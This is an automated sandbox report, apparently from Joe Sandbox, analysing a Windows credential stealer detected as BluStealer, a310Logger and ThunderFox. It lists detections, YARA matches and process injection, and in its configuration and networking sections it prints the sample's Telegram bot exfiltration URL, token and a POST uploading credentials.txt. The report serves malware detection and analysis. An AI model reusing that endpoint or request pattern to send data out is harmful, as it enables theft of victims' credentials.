Windows Analysis Report
SecuriteInfo.com.W32.AIDetectNet.01.19566.31995

Overview

General Information

Sample Name: SecuriteInfo.com.W32.AIDetectNet.01.19566.31995 (renamed file extension from 31995 to exe)
Analysis ID: 679095
MD5: 7278f8490937cab29d3dd5bc75cb52ab
SHA1: 69a0419c995fc139ea27e731a44205cb1b686f1d
SHA256: 0fabbda008ee7544a4f2d1bdaf5621f19bc41e82740f293dfe1644fc0af9230b
Tags: exe

Detection

BluStealer, ThunderFox Stealer, a310Logger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected BluStealer
Antivirus / Scanner detection for submitted sample
Yara detected a310Logger
Yara detected ThunderFox Stealer
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Uses a known web browser user agent for HTTP communication
Contains functionality to detect virtual machines (SLDT)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

AV Detection

Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Virustotal: Detection: 25%
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Avira: detected
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Joe Sandbox ML: detected
Source: 14.0.MSBuild.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.461f2c8.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.unpack Avira: Label: TR/Dropper.Gen
Source: 0.0.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.f10000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: 16.0.AppLaunch.exe.4e00000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.45f72a8.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.unpack Avira: Label: TR/Dropper.Gen
Source: 14.0.MSBuild.exe.400000.0.unpack Malware Configuration Extractor: BluStealer {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendMessage?chat_id=1269002131"}
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.42.16:443 -> 192.168.2.3:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.3:49753 version: TLS 1.2
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ThunderFox.pdb source: AppLaunch.exe, 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\

Networking

Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.5b80000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.408533446.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Joe Sandbox View JA3 fingerprint: 10ee8d30a5d01c042afd7b2b205facc4
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: global traffic HTTP traffic detected: POST /bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269002131&caption=credentials.txt:::computer\user HTTP/1.1
  Accept: */*
  Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
  Accept-Language: en-us
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: api.telegram.org
  Content-Length: 201
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: MSBuild.exe, 0000000E.00000002.537276033.0000000000F73000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000003.421757868.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.359072458.000000000340B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/
Source: MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/Qv
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000000.351294987.0000000000401000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269
Source: MSBuild.exe, 0000000E.00000003.422081191.0000000000F11000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: unknown DNS traffic detected: queries for: api.telegram.org

System Summary

Source: 16.3.AppLaunch.exe.7e9a6e8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 16.3.AppLaunch.exe.7e9a6e8.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 16.2.AppLaunch.exe.9250000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.45f72a8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.461f2c8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects A310Logger Author: ditekSHen
Source: 16.2.AppLaunch.exe.9250000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000000.00000002.379707702.0000000004597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.364389176.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, bgr.cs Large array initialization: tms: array initializer size 2385920
Source: 16.3.AppLaunch.exe.7e9a6e8.0.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.AppLaunch.exe.7e9a6e8.0.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpScribbles date = 2021-01-21, author = Arnim Rupp, description = Detects .NET red/black-team tools via typelibguid, reference = https://github.com/V1V1/SharpScribbles, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 16.3.AppLaunch.exe.7e9a6e8.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.AppLaunch.exe.9250000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.AppLaunch.exe.7e9a6e8.0.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpScribbles date = 2021-01-21, author = Arnim Rupp, description = Detects .NET red/black-team tools via typelibguid, reference = https://github.com/V1V1/SharpScribbles, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.AppLaunch.exe.9250000.0.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpScribbles date = 2021-01-21, author = Arnim Rupp, description = Detects .NET red/black-team tools via typelibguid, reference = https://github.com/V1V1/SharpScribbles, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.45f72a8.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.461f2c8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 16.2.AppLaunch.exe.9250000.0.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.AppLaunch.exe.9250000.0.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpScribbles date = 2021-01-21, author = Arnim Rupp, description = Detects .NET red/black-team tools via typelibguid, reference = https://github.com/V1V1/SharpScribbles, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: HKTL_NET_GUID_SharpScribbles date = 2021-01-21, author = Arnim Rupp, description = Detects .NET red/black-team tools via typelibguid, reference = https://github.com/V1V1/SharpScribbles, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.379707702.0000000004597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.364389176.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_01BCF030
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_01BC3D10
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_01BC3D00
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_05484A60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_05484A50
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_06337E12
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_0633A48D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_0633BEB5
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_06358337
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_0635DF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 16_2_051305B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 16_2_051305A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 16_2_05134850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 16_2_05134860
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383883284.00000000046DC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBB NATIVE BOTNET.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.358839460.00000000033F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.384949271.000000000477C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBB NATIVE BOTNET.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000000.262097375.0000000000F12000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameProforma Invoice INV-87634543-7.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.361648144.00000000034B6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBB NATIVE BOTNET.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Binary or memory string: OriginalFilenameProforma Invoice INV-87634543-7.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Virustotal: Detection: 25%
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.log
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@1/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\Users\desktop.ini
Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';n
Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;>Cannot add a PRIMARY KEY column4Cannot add a UNIQUE columntCannot add a REFERENCES column with non-NULL default valuehCannot add a NOT NULL column with default value NULLZCannot add a column with non-constant default
Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' 4
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000000.351294987.0000000000401000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: hti.sLnagaugfe
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000000.351294987.0000000000401000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: F*\AC:\Users\TSC\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp$
Source: MSBuild.exe, 0000000E.00000002.531785304.000000000046C000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: F*\AC:\Users\TSC\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Binary or memory string: .vbpmva
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Binary or memory string: mt]wXwA~ll.vbpmrv
Source: 16.0.AppLaunch.exe.4e00000.0.unpack, QpTcrT36DsVgpTtXLp/Oq9yjRC3GTOkApLxE8.cs Cryptographic APIs: 'CreateDecryptor'
Source: 16.0.AppLaunch.exe.4e00000.0.unpack, QpTcrT36DsVgpTtXLp/Oq9yjRC3GTOkApLxE8.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\Windows\System32\drivers\etc\hosts
